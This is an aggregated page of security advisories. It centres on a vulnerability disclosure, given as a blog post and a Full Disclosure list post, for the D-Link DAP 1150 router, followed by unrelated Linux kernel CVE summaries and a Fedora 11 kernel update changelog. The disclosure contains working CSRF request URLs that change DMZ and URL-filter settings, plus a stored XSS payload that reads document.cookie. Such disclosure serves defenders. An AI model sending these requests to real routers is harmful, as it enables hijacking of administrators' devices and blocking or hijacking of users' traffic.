Multiple cross-site request forgery (CSRF) vulnerabilities in D-Link DAP 1150 with firmware 1.2.94 allow remote attackers to hijack the authentication of administrators for requests that (1) enable or (2) disable the DMZ in the Firewall/DMZ section via a request to index.cgi or (3) add, (4) modify, or (5) delete URL-filter settings in the Control/URL-filter section via a request to index.cgi, as demonstrated by adding a rule that blocks access to google.com.

Продовжуючи тему уразливостей в D-Link DAP 1150. Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості в режимі роутера. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery, Abuse of Functionality та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.

Нагадаю, що в першому звіті про уразливості в D-Link DAP 1150, я писав про CSRF в формі логіна в адмінку пристрою та інші уразливості, що дозволяють віддалено входити в адмінку для проведення CSRF і XSS атак всередині адмінки.

CSRF (WASC-09):

В розділі Firewall / DMZ через CSRF можна змінювати налаштувань DMZ.

Включити DMZ:

    http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=23&res_struct_size=0&res_buf={%22enable%22:true,%22ip%22:%22192.168.1.1%22}&res_pos=0

Виключити DMZ:

    http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=23&res_struct_size=0&res_buf={%22enable%22:false,%22ip%22:%22%22}&res_pos=0

CSRF (WASC-09):

В розділі Control / URL-filter через CSRF можна додавати, редагувати та видаляти налаштування URL-фільтрів.

Додати:

    http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://site%22,%20%22enable%22:%22ACCEPT%22}&res_pos=-1

Редагувати:

    http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://site%22,%20%22enable%22:%22ACCEPT%22}&res_pos=0

Видалити:

    http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_struct_size=0&res_config_id=58&res_pos=0

Abuse of Functionality (WASC-42):

Цей функціонал можна використати для блокування доступу користувачам роутера до сайтів. Заборонити доступ до google.com:

    http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://google.com%22,%20%22enable%22:%22DROP%22}&res_pos=-1

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Control / URL-filter.

Атака через функцію додавання в параметрі res\_buf:

    http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22enable%22:%22%22}&res_pos=-1

This entry was posted on 23:55 16.04.2014 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

CVE-2014-3760: CSRF, AoF та XSS уразливості в D-Link DAP 1150 - Websecurity

Cross-site scripting (XSS) vulnerability in D-Link DAP 1150 with firmware 1.2.94 allows remote attackers to inject arbitrary web script or HTML via the res_buf parameter to index.cgi in the Control/URL-filter section.

**Full Disclosure mailing list archives**

_From_: "MustLive" <mustlive () websecurity com ua>  
_Date_: Fri, 18 Apr 2014 23:49:23 +0300  

Hello list!

In 2011 and beginning of 2012 I wrote about multiple vulnerabilities (http://securityvulns.ru/docs27440.html, http://securityvulns.ru/docs27677.html, http://securityvulns.ru/docs27676.html) in D-Link DAP 1150 (several dozens). That time I wrote about vulnerabilities in admin panel in Access Point mode and now I'll write about holes in Router mode.

I present new vulnerabilities in this device. There are Cross-Site Request Forgery, Abuse of Functionality and Cross-Site Scripting vulnerabilities in D-Link DAP 1150 (Wi-Fi Access Point and Router).

SecurityVulns ID: 12076.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This model with other firmware versions also must be vulnerable. D-Link ignored all vulnerabilities in this device (as in other devices, which I informed them about) and still didn't fix them.

\----------
Details:
----------

I remind you, that in the first report about vulnerabilities in D-Link DAP 1150 (http://securityvulns.ru/docs27440.html), I wrote about CSRF in login form and other vulnerabilities, which allow to remotely log into admin panel for conducting CSRF and XSS attacks inside admin panel.

CSRF (WASC-09):

In section Firewall / DMZ via CSRF it's possible to change settings of DMZ.

Turn on DMZ:

http://192.168.0.50/index.cgi?v2=y&rq=y&res\_json=y&res\_data\_type=json&res\_config\_action=3&res\_config\_id=23&res\_struct\_size=0&res\_buf={%22enable%22:true,%22ip%22:%22192.168.1.1%22}&res\_pos=0

Turn off DMZ:

http://192.168.0.50/index.cgi?v2=y&rq=y&res\_json=y&res\_data\_type=json&res\_config\_action=3&res\_config\_id=23&res\_struct\_size=0&res\_buf={%22enable%22:false,%22ip%22:%22%22}&res\_pos=0

CSRF (WASC-09):

In section Control / URL-filter via CSRF it's possible to add, edit and delete settings of URL-filters.

Add:

http://192.168.0.50/index.cgi?v2=y&rq=y&res\_json=y&res\_data\_type=json&res\_config\_action=3&res\_struct\_size=0&res\_config\_id=58&res\_buf={%22url%22:%22http://site%22,%20%22enable%22:%22ACCEPT%22}&res\_pos=-1

Edit:

http://192.168.0.50/index.cgi?v2=y&rq=y&res\_json=y&res\_data\_type=json&res\_config\_action=3&res\_struct\_size=0&res\_config\_id=58&res\_buf={%22url%22:%22http://site%22,%20%22enable%22:%22ACCEPT%22}&res\_pos=0

Delete:

http://192.168.0.50/index.cgi?v2=y&rq=y&res\_json=y&res\_data\_type=json&res\_config\_action=2&res\_struct\_size=0&res\_config\_id=58&res\_pos=0

Abuse of Functionality (WASC-42):

This functionality can be used to block access to web sites for users of the router. Block access to google.com:

http://192.168.0.50/index.cgi?v2=y&rq=y&res\_json=y&res\_data\_type=json&res\_config\_action=3&res\_struct\_size=0&res\_config\_id=58&res\_buf={%22url%22:%22http://google.com%22,%20%22enable%22:%22DROP%22}&res\_pos=-1

XSS (WASC-08):

This is persistent XSS. The code will execute in section Control / URL-filter.

Attack via add function in parameter res\_buf:

http://192.168.0.50/index.cgi?v2=y&rq=y&res\_json=y&res\_data\_type=json&res\_config\_action=3&res\_struct\_size=0&res\_config\_id=58&res\_buf={%22url%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22enable%22:%22%22}&res\_pos=-1

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7112/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site

http://websecurity.com.ua

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **CSRF, AoF and XSS vulnerabilities in D-Link DAP 1150** _MustLive (Apr 18)_

CVE-2014-3761: CSRF, AoF and XSS vulnerabilities in D-Link DAP 1150

Race condition in the mac80211 subsystem in the Linux kernel before 3.13.7 allows remote attackers to cause a denial of service (system crash) via network traffic that improperly interacts with the WLAN_STA_PS_STA state (aka power-save mode), related to sta_info.c and tx.c.

CVE-2014-2706

The tcp_rcv_state_process function in net/ipv4/tcp_input.c in the Linux kernel before 3.2.24 allows remote attackers to cause a denial of service (kernel resource consumption) via a flood of SYN+FIN TCP packets, a different vulnerability than CVE-2012-2663.

CVE-2012-6638

The aac_compat_ioctl function in drivers/scsi/aacraid/linit.c in the Linux kernel before 3.11.8 does not require the CAP_SYS_RAWIO capability, which allows local users to bypass intended access restrictions via a crafted ioctl call.

CVE-2013-6383

The journal_unmap_buffer function in fs/jbd2/transaction.c in the Linux kernel before 3.3.1 does not properly handle the _Delay and _Unwritten buffer head states, which allows local users to cause a denial of service (system crash) by leveraging the presence of an ext4 filesystem that was mounted with a journal.

CVE-2011-4086

The print_fatal_signal function in kernel/signal.c in the Linux kernel before 2.6.32.4 on the i386 platform, when print-fatal-signals is enabled, allows local users to discover the contents of arbitrary memory locations by jumping to an address and then reading a log file, and might allow local users to cause a denial of service (system slowdown or crash) by jumping to an address.

**updates at fedoraproject.org** updates at fedoraproject.org  
_Fri Jan 22 22:36:26 UTC 2010_

*   Previous message: Fedora 11 Update: cclive-0.5.8-1.fc11
*   Next message: Fedora 12 Update: mono-2.4.3.1-1.fc12
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

\--------------------------------------------------------------------------------
Fedora Update Notification
FEDORA-2010-0919
2010-01-22 22:11:51
--------------------------------------------------------------------------------

Name        : kernel
Product     : Fedora 11
Version     : 2.6.30.10
Release     : 105.2.4.fc11
URL         : http://www.kernel.org/
Summary     : The Linux kernel
Description :
The kernel package contains the Linux kernel (vmlinuz), the core of any
Linux operating system.  The kernel handles the basic functions
of the operating system: memory allocation, process allocation, device
input and output, etc.

--------------------------------------------------------------------------------
Update Information:

Security update: CVE-2010-0003 CVE-2010-0006 CVE-2010-0007
--------------------------------------------------------------------------------
ChangeLog:

\* Tue Jan 19 2010 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.10-105.2.4
- CVE-2010-0003: kernel: infoleak if print-fatal-signals=1
\* Tue Jan 19 2010 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.10-105.2.3
- CVE-2010-0007: kernel: normal users can modify ebtables rules (#555238)
\* Tue Jan 19 2010 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.10-105.2.2
- Backport fix for CVE-2010-0006:
  kernel: ipv6: skb\_dst() can be NULL in ipv6\_hop\_jumbo() (rhbz#555217)
\* Fri Dec 25 2009 Dan Williams <dcbw at redhat.com\> 2.6.30.10-105.2.1
- libertas: fix crash on 64-bit platforms with >= 4GB RAM
\* Thu Dec 24 2009 Kyle McMartin <kyle at redhat.com\> 2.6.30.10-105
- fuse: fix kunmap in fuse\_ioctl\_copy\_user, #549400
\* Tue Dec  8 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.10-104
- Copy fix for #540580 from F-12.
\* Fri Dec  4 2009 Kyle McMartin <kyle at redhat.com\> 2.6.30.10-103
- 2.6.30.10
- nuke ipv4-fix-null-ptr-deref-in-ip\_fragment.patch, it's in the latest
  stable release.
\* Thu Dec  3 2009 Kyle McMartin <kyle at redhat.com\> 2.6.30.9-102
- ipv4-fix-null-ptr-deref-in-ip\_fragment.patch: null ptr deref
  bug fix.
\* Thu Nov 19 2009 Kyle McMartin <kyle at redhat.com\>
- fuse-prevent-fuse\_put\_request-in-invalid-ptr.patch: fix oops in fuse
  when low on memory. rhbz#538734.
\* Thu Nov 19 2009 David Woodhouse <David.Woodhouse at intel.com\> 2.6.30.9-100
- Re-enable CONFIG\_DMAR\_GFX\_WA on x86\_64.
\* Tue Nov 17 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-99
- Silence pointless DRM warning message (#537196)
\* Tue Nov 17 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-98
- More sata\_nv fixes (#524756).
\* Mon Nov 16 2009 Eric Sandeen <sandeen at redhat.com\> 2.6.30.9-97
- Fix ext4 preallocation-related corruption (#513221)
\* Tue Nov  3 2009 Kyle McMartin <kyle at redhat.com\> 2.6.30.9-96
- fs/pipe.c: fix null pointer dereference (CVE-2009-3547)
\* Sun Oct 25 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-95
- Disable the stack protector on functions that don't have onstack arrays.
\* Thu Oct 22 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-94
- Fix overflow in KVM cpuid code. (CVE-2009-3638)
\* Thu Oct 22 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-93
- Fix exploitable oops in keyring code (CVE-2009-3624)
\* Wed Oct 21 2009 Kyle McMartin <kyle at redhat.com\>
- shut-up-LOCK\_TEST\_WITH\_RETURN.patch: sort out #445331... or paper bag
  over it for now until the lock warnings can be killed.
\* Mon Oct 19 2009 Kyle McMartin <kyle at redhat.com\>
- af\_unix-fix-deadlock-connecting-to-shutdown-socket.patch: fix for
  rhbz#529626 local DoS. (CVE-2009-3621)
\* Sat Oct 17 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-90
- Fix null deref in r128 (F10#487546) (CVE-2009-3620)
\* Sat Oct 17 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-89
- Keyboard and mouse fixes from 2.6.32 (#522126)
\* Sat Oct 17 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-88
- Scheduler wakeup patch, fixes high latency on wakeup
  (sched-update-the-clock-of-runqueue-select-task-rq-selected.patch)
\* Fri Oct 16 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-87
- Fix uninitialized data leak in netlink (CVE-2009-3612)
\* Thu Oct 15 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-86
- AX.25 security fix (CVE-2009-2909)
\* Thu Oct 15 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-85
- Disable CONFIG\_USB\_STORAGE\_CYPRESS\_ATACB because it causes failure
  to boot from USB disks using Cypress bridges (#524998)
\* Tue Oct 13 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-84
- Copy libata drive detection fix from 2.6.31.4 (#524756)
\* Tue Oct 13 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-83
- Networking fixes taken from 2.6.31-stable
\* Tue Oct 13 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.9-82
- Fix boot hang with ACPI on some systems.
\* Mon Oct 12 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-81
- Critical ftrace fixes:
  ftrace-use-module-notifier-for-function-tracer.patch
  ftrace-check-for-failure-for-all-conversions.patch
  tracing-correct-module-boundaries-for-ftrace\_release.patch
\* Thu Oct  8 2009 Ben Skeggs <bskeggs at redhat.com\>     2.6.30.9-80
- ppc: compile nvidiafb as a module only, nvidiafb+nouveau = bang! (rh#491308)
\* Wed Oct  7 2009 Dave Jones <davej at redhat.com\>       2.6.30.9-78
- Disable IRQSOFF tracer. (Adds unnecessary overhead when unused)
\* Wed Oct  7 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-77
- eCryptfs fixes taken from 2.6.31.2 (fixes CVE-2009-2908)
\* Tue Oct  6 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-76
- fix race in forcedeth network driver (#526546)
\* Tue Oct  6 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-75
- x86: Don't leak 64-bit reg contents to 32-bit tasks.
\* Tue Oct  6 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-74
- ACPI EC bug fixes taken from kernel 2.6.32 (#492699, #525681)
\* Mon Oct  5 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-73
- Linux 2.6.30.9
\* Sun Oct  4 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-72.rc3
- Copy stack randomization fix from 2.6.31.2 (F10#526882)
\* Sun Oct  4 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.9-71.rc3
- Linux 2.6.30.9-rc3
- Drop merged upstream patches:
  linux-2.6-cifs-reenable-lanman-security.patch
  kvm-guest-fix-bogus-wallclock-physical-address-calculation.patch
  kvm-mmu-make-\_\_kvm\_mmu\_free\_some\_pages-handle-empty-list.patch
  kvm-vmx-check-cpl-before-emulating-debug-register-access.patch
  kvm-vmx-fix-cr8-exiting-control-clobbering-by-ept.patch
  kvm-x86-disallow-hypercalls-for-guest-callers-in-rings-0.patch
  linux-2.6-kvm-revert-x86-check-for-cr3-validity.patch
\* Fri Oct  2 2009 Justin M. Forbes <jforbes at redhat.com\>  2.6.30.8-70
- Add linux-2.6-virtio-net-refill-on-out-of-memory.patch, from 2.6.31
  to prevent page allocation failures in guests. (#520119)
\* Mon Sep 28 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.8-69
- Add linux-2.6-kvm-revert-x86-check-for-cr3-validity.patch, from
  2.6.32-rc, fixes bug #525743
\* Mon Sep 28 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.8-68
- Drop sched-disable-NEW-FAIR-SLEEPERS-for-now.patch, reported to
  cause problems on 2.6.30.
\* Sat Sep 26 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.8-67
- Scheduler fixes cherry-picked from 2.6.32
\* Sat Sep 26 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.8-66
- Backport "appletalk: Fix skb leak when ipddp interface is not loaded"
  (fixes CVE-2009-2903)
\* Sat Sep 26 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.8-65
- KVM fixes from 2.6.31.1, including fix for CVE-2009-3290
\* Fri Sep 25 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.8-64
- Fix serious CFQ performance regression.
\* Fri Sep 25 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.8-63
- Disable the GEM graphics manager on i686 PAE kernels
  (fixes modesetting on Intel graphics.)
\* Fri Sep 25 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.8-62
- Fix breakage in hostap driver (#522269)
\* Thu Sep 24 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.8-61
- Backport the cpuidle-faster-io fix from Fedora 12 to fix I/O
  performance problems when reading/writing multiple disks.
\* Thu Sep 24 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.8-60
- Linux 2.6.30.8
\* Thu Sep 24 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.7-59
- Disable sound powersave by default; it still pops when playing sounds. (#523836)
\* Wed Sep 16 2009 Justin M. Forbes <jforbes at redhat.com\> 2.6.30.7-58
- Revert virtio\_blk to rotational mode. (#509383)
\* Tue Sep 15 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.7-57
- Linux 2.6.30.7
\* Tue Sep 15 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.7-56.rc1
- Fix CIFS security flags mask broken in 2.6.30 (#523173)
\* Tue Sep 15 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.7-55.rc1
- Fix cpufreq lockdep warnings (#522685)
\* Sat Sep 12 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.7-54.rc1
- 2.6.30.7-rc1
- Drop patches merged in -stable:
   linux-2.6-slub-fix-destroy-by-rcu.patch
\* Thu Sep 10 2009 Dennis Gilmore <dennis at ausil.us\> 2.6.30.6-53
- kgdb only works on sparc64 smp kernels so disable on the up one and enable on the smp one
- update to 256 cpus supported on sparc64 smp
\* Wed Sep  9 2009 Chuck Ebbert <cebbert at redhat.com\>  2.6.30.6-52
- Add linux-2.6-slub-fix-destroy-by-rcu.patch (fixes bug in 2.6.30.4)
\* Wed Sep  9 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.6-51
- 2.6.30.6
- Drop patches merged in -stable:
  do\_sigaltstack-avoid-copying-stack\_t-as-a-structure-to-userspace.patch
  linux-2.6-x86-dont-send-ipi-to-empty-set-cpus.patch
  linux-2.6-bitmap-make-ops-return-result.patch
  linux-2.6-x86-dont-call-send-ipi-mask-with-empty-mask.patch
  linux-2.6-clone-fix-race-between-copy-process-and-de-thread.patch
  linux-2.6-kthreads-fix-kthread-create-vs-kthread-stop.patch
  linux-2.6-xen-x86-dont-probe-if-apics-are-disabled.patch
\* Tue Sep  8 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-50
- Disable Amiga One support to fix powerpc coherency bug (#521703)
\* Fri Sep  4 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-49
- Fix build system getting confused during firmware install.
\* Fri Sep  4 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-48
- Added additional fixes needed for #514787:
  linux-2.6-ppc64-vs-broadcom-lmb-no-init-\*.patch
- Fix up lirc patch context so it applies.
\* Wed Sep  2 2009 Jarod Wilson <jarod at redhat.com\>
- Make it possible to rmmod lirc\_zilog w/o it hanging indefinitely
- Add transmit support (via port 2 only) on 1st-gen mceusb transceiver
\* Tue Sep  1 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-46
- Fix yet another Xen boot crash (#520517)
\* Tue Sep  1 2009 Jarod Wilson <jarod at redhat.com\> 2.6.30.5-45
- Refresh lirc patches, add new lirc\_ene0100 driver
- Fix up hdpvr driver for use with modular i2c so that
  lirc\_zilog can actually bind to it
- Make lirc\_zilog IR transmit and receive work on the hdpvr
- Fix audio on PVR-500 when used in same system as HVR-1800 (#480728)
\* Fri Aug 28 2009 David Woodhouse <David.Woodhouse at intel.com\>
- Enable Solos DSL driver
\* Thu Aug 27 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-43
- Don't load the floppy driver automatically:
  linux-2.6-defaults-die-floppy-die.patch
\* Thu Aug 27 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-42
- Fix stackprotector problems with Xen on x86\_64.
- Disable stackprotector on i386 until 32-bit Xen gets fixed.
\* Thu Aug 27 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-41
- linux-2.6-kthreads-fix-kthread-create-vs-kthread-stop.patch:
  fix race in kthreads.
\* Thu Aug 27 2009 Justin M. Forbes <jforbes at redhat.com\> 2.6.30.5-40
- xen: Fix guest crash when trying to debug. (#458385)
\* Thu Aug 27 2009 John W. Linville <linville at redhat.com\> 2.6.30.5-39
- zd1211rw: adding 083a:e503 as a ZD1211B device (#518538)
\* Thu Aug 27 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-38
- Fix string overflows found by stackprotector:
  hda-check-strcpy-length.patch
  linux-2.6-v4l-dvb-af9015-fix-stack-corruption.patch
\* Thu Aug 27 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-37
- Fix race in clone() syscall.
\* Thu Aug 27 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-36
- Fix hangs on older x86 systems with 440\*X chipsets.
\* Fri Aug 21 2009 David Woodhouse <David.Woodhouse at intel.com\>
- Fix b43 on iMac G5 (#514787)
\* Tue Aug 18 2009 Kyle McMartin <kyle at redhat.com\>
- Backport several upstream commits 52dec22e739eec8f3a0154f768a599f5489048bd
  to improve mmap\_min\_addr.
- CVE-2009-2847: do\_sigaltstack: avoid copying 'stack\_t' as a
  structure to user space
\* Mon Aug 17 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-32
- Change config options:
  CONFIG\_SCSI\_DEBUG=m
  CONFIG\_PCI\_MSI\_DEFAULT\_ON=y
\* Mon Aug 17 2009 Jarod Wilson <jarod at redhat.com\> 2.6.30.5-31
- Fix flub in prior lirc patch update that resulted in no lirc
  drivers getting built
\* Sun Aug 16 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-29
- Linux 2.6.30.5
\* Fri Aug 14 2009 Chuck Ebbert <cebbert at redhat.com\> 2.6.30.5-28.rc2
- Linux 2.6.30.5-rc2
- Dropped drm-intel-tv-fix.patch, merged in -stable now.
\* Wed Aug 12 2009 Kyle McMartin <kyle at redhat.com\>
- drm-no-gem-on-i8xx.patch: fix misspelled IS\_8XX & IS\_I845G, sigh.
\* Wed Aug 12 2009 Kyle McMartin <kyle at redhat.com\>
- DRM patch sync-up with F-11-2.6.29.y, ABI probably isn't right yet though...
 - drm-modesetting-radeon.patch
 - drm-nouveau.patch
 - drm-no-gem-on-i8xx.patch
 - drm-i915-resume-force-mode.patch
 - drm-intel-big-hammer.patch
 - drm-intel-gen3-fb-hack.patch
 - drm-intel-hdmi-edid-fix.patch
 - drm-modesetting-radeon-fixes.patch
 - drm-radeon-new-pciids.patch
 - drm-dont-frob-i2c.patch
 - drm-intel-tv-fix.patch
 - drm-radeon-cs-oops-fix.patch
 - drm-pnp-add-resource-range-checker.patch
 - drm-i915-enable-mchbar.patch
- The rest were merged upstream.
\* Wed Aug 12 2009 John W. Linville <linville at redhat.com\>
- iwlwifi: fix TX queue race
\* Mon Aug 10 2009 Kyle McMartin <kyle at redhat.com\>
- Patch sync-up with F-11-2.6.29.y:
 - linux-2.6-x86-delay-tsc-barrier.patch
 - linux-2.6-fs-cifs-fix-port-numbers.patch
 - linux-2.6-kvm-skip-pit-check.patch
 - linux-2.6.29-xen-disable-gbpages.patch
 - linux-2.6-virtio\_blk-dont-bounce-highmem-requests.patch
 - linux-2.6-drivers-char-low-latency-removal.patch
 - linux-2.6-serial-add-txen-test-param.patch
 - linux-2.6-input-wacom-bluetooth.patch
 - linux-2.6-defaults-saner-vm-settings.patch
 - linux-2.6-mm-lru-evict-streaming-io-pages-first.patch
 - linux-2.6-mm-lru-report-vm-flags-in-page-referenced.patch
 - linux-2.6-mm-lru-dont-evict-mapped-executable-pages.patch
 - linux-2.6-utrace.patch
 - linux-2.6-utrace-ftrace.patch
 - linux-2.6-tracehook.patch
\* Mon Aug 10 2009 Jarod Wilson <jarod at redhat.com\>
- Add tunable pad threshold support to lirc\_imon
- Blacklist all iMON devices in usbhid driver so lirc\_imon can bind
- Add new device ID to lirc\_mceusb (#512483)
- Enable IR transceiver on the HD PVR
\* Wed Aug  5 2009 Kyle McMartin <kyle at redhat.com\>
- Update to released 2.6.30.4.
- Drop now-unneeded upstream reverts.
\* Wed Jul 29 2009 Chuck Ebbert <cebbert at redhat.com\>
- Linux 2.6.30.4-rc1
\* Mon Jul 27 2009 Neil Horman <nhorman at redhat.com\>
- Backport xfrm gc\_thresh export code (bz 503124)
\* Fri Jul 24 2009 Kyle McMartin <kyle at redhat.com\>
- CONFIG\_DEFAULT\_MMAP\_MIN\_ADDR=65536 \[i386 x86\_64\], 4096 elsewhere, as
  per defconfigs.
- Blat patches from other tag, now to rebase fixes, splat in the changelog,
  and tag it for building.
\* Fri Jul 24 2009 Kyle McMartin <kyle at redhat.com\>
- Copy over release configs from devel-2.6.30 tag.
- Fix up some spec deviations.
\* Fri Jul 24 2009 Kyle McMartin <kyle at redhat.com\>
- Linux 2.6.30.3 rebase for Fedora 11.
- Fedora 11 2.6.29 branch is on tag private-fedora-11-2\_6\_29\_6.
--------------------------------------------------------------------------------
References:

  \[ 1 \] Bug #554578 - CVE-2010-0003 kernel: infoleak if print-fatal-signals=1
        https://bugzilla.redhat.com/show\_bug.cgi?id=554578
  \[ 2 \] Bug #555217 - CVE-2010-0006 kernel: ipv6: skb\_dst() can be NULL in ipv6\_hop\_jumbo()
        https://bugzilla.redhat.com/show\_bug.cgi?id=555217
  \[ 3 \] Bug #555238 - CVE-2010-0007 kernel: netfilter: ebtables: enforce CAP\_NET\_ADMIN
        https://bugzilla.redhat.com/show\_bug.cgi?id=555238
--------------------------------------------------------------------------------

This update can be installed with the "yum" update program.  Use 
su -c 'yum update kernel' at the command line.
For more information, refer to "Managing Software with yum",
available at http://docs.fedoraproject.org/yum/.

All packages are signed with the Fedora Project GPG key.  More details on the
GPG keys used by the Fedora Project can be found at
http://fedoraproject.org/keys
--------------------------------------------------------------------------------

*   Previous message: Fedora 11 Update: cclive-0.5.8-1.fc11
*   Next message: Fedora 12 Update: mono-2.4.3.1-1.fc12
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

More information about the package-announce mailing list

Tag

#wifi